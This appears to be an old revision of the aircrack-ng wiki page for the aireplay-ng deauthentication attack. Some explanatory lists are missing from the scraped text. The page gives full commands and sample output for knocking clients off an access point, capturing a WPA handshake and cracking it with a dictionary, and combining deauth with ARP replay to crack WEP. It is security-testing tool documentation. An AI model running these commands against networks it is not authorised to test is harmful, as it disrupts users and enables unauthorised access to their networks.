This is an old revision of the document!
This attack sends disassocate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons:
Of course, this attack is totally useless if there are no associated wireless client or on a fake authentications.
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
Where:
First, you determine a client which is currently connected. You need the MAC address for the following command:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
Where:
Here is what the ouput looks like:
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
airmon-ng start ath0 airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0 (switch to another console) aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0 (wait for a few seconds) aircrack-ng -w /path/to/dictionary out.cap
Here the explaination of the above commands:
airodump-ng -c 6 –bssid 00:14:6C:7E:40:80 -w out ath0
Where:
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
Where:
Here is what the output looks like from “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”
12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:57 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
airmon-ng start wlan0 airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0 (switch to another console) aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0 aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
After sending the ten batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.
If the driver is wlan-ng/, you should run the airmon-ng script (unless you know what to type) otherwise the card won't be correctly setup for injection.
It is usually more effective to target a specific station using the -c parameter.
The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them.
There can be several reasons and one or more can affect you:
See the general aireplay-ng troubleshooting ideas: aireplay-ng usage troubleshooting.